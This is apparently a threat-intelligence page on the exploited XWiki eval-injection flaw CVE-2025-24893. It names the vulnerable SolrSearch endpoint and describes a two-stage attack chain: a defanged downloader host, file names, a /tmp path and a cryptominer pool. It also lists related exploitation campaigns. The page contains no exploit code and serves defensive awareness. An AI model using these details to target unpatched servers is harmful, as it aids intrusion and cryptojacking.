XWiki eval injection actively exploited remote code execution flaw (CVE-2025-24893)
Vulnerability
Summary
Hide ▲
Show ▼
The XWiki eval injection flaw CVE-2025-24893 is being actively exploited, putting exposed servers at risk of remote code execution via /bin/get/Main/SolrSearch. Attackers are chaining the bug into a two-stage workflow that drops a downloader and ultimately installs a cryptocurrency miner. VulnCheck said it observed exploitation attempts against XWiki canaries, and real-world abuse has been reported since March 2025. Users should apply updates as soon as possible to reduce exposure.
Cases
Related Happenings
TeamPCP Mini Shai-Hulud npm supply-chain campaign
Campaign
First: 12.05.2026 14:07
Last: 12.05.2026 14:07
Sources 1
About this happening:
The **TeamPCP**-linked **Mini Shai-Hulud** campaign is a **malicious npm supply-chain operation** that steals developer credentials and abuses trusted publishing paths to spread t...
TeamPCP Mini Shai-Hulud npm supply-chain campaign
CampaignAbout this happening: The **TeamPCP**-linked **Mini Shai-Hulud** campaign is a **malicious npm supply-chain operation** that steals developer credentials and abuses trusted publishing paths to spread t...
CPanel & WHM authentication-bypass exploitation wave (CVE-2026-41940)
Exploitation Wave
First: 04.05.2026 11:25
Last: 04.05.2026 11:25
Sources 1
About this happening:
Active exploitation of **CVE-2026-41940** is driving a **large cPanel & WHM compromise wave**, putting exposed servers at risk of administrative takeover. **More than 40,000 serve...
CPanel & WHM authentication-bypass exploitation wave (CVE-2026-41940)
Exploitation WaveAbout this happening: Active exploitation of **CVE-2026-41940** is driving a **large cPanel & WHM compromise wave**, putting exposed servers at risk of administrative takeover. **More than 40,000 serve...
CISA Apache ActiveMQ CVE-2026-34197 mitigation order
Advisory/Mitigation
First: 21.04.2026 14:17
Last: 21.04.2026 14:17
Sources 1
About this happening:
**CISA** ordered **FCEB agencies** to secure **Apache ActiveMQ** servers by **April 30** after **CVE-2026-34197** was confirmed **actively exploited**. The flaw can allow **arbitr...
CISA Apache ActiveMQ CVE-2026-34197 mitigation order
Advisory/MitigationAbout this happening: **CISA** ordered **FCEB agencies** to secure **Apache ActiveMQ** servers by **April 30** after **CVE-2026-34197** was confirmed **actively exploited**. The flaw can allow **arbitr...
Oracle WebLogic Server CVE-2026-21962 rapid exploitation wave
Exploitation Wave
First: 26.03.2026 18:00
Last: 26.03.2026 18:00
Sources 1
About this happening:
**Oracle WebLogic Server** systems faced a rapid **CVE-2026-21962** exploitation wave after public exploit code appeared, creating immediate **RCE risk** for exposed servers. The...
Oracle WebLogic Server CVE-2026-21962 rapid exploitation wave
Exploitation WaveAbout this happening: **Oracle WebLogic Server** systems faced a rapid **CVE-2026-21962** exploitation wave after public exploit code appeared, creating immediate **RCE risk** for exposed servers. The...
HPE OneView RondoDox exploitation wave (CVE-2025-37164)
Exploitation Wave
First: 16.01.2026 11:15
Last: 16.01.2026 11:15
Sources 1
About this happening:
**RondoDox** has driven a **large-scale exploitation wave** against **HPE OneView** by targeting **CVE-2025-37164**, with activity escalating into **automated attacks** that creat...
HPE OneView RondoDox exploitation wave (CVE-2025-37164)
Exploitation WaveAbout this happening: **RondoDox** has driven a **large-scale exploitation wave** against **HPE OneView** by targeting **CVE-2025-37164**, with activity escalating into **automated attacks** that creat...
Timeline
-
29.10.2025 09:44 3 articles · 7mo ago
VulnCheck reports active exploitation of XWiki CVE-2025-24893
Technical Analysis UpdateVulnCheck said attackers are actively exploiting XWiki CVE-2025-24893, an eval injection flaw that can allow arbitrary remote code execution through a request to the "/bin/get/Main/SolrSearch" endpoint. The observed abuse targeted XWiki canaries from an attacker geolocated in Vietnam and used a two-stage workflow: wget retrieved the downloader "x640" from "193.32.208[.]24:8080" and wrote it to "/tmp/11909", then follow-on payloads "x521" and "x522" fetched a cryptocurrency miner, killed competing miners such as XMRig and Kinsing, and launched the miner with a c3pool.org configuration.
Show sources
- Active Exploits Hit Dassault and XWiki — CISA Confirms Critical Flaws Under Attack — thehackernews.com — 29.10.2025 09:44
- RondoDox botnet malware now hacks servers using XWiki flaw — www.bleepingcomputer.com — 18.11.2025 00:41
- XWiki Vulnerability Exploited in Cryptocurrency Mining Operation — www.securityweek.com — 29.10.2025 12:53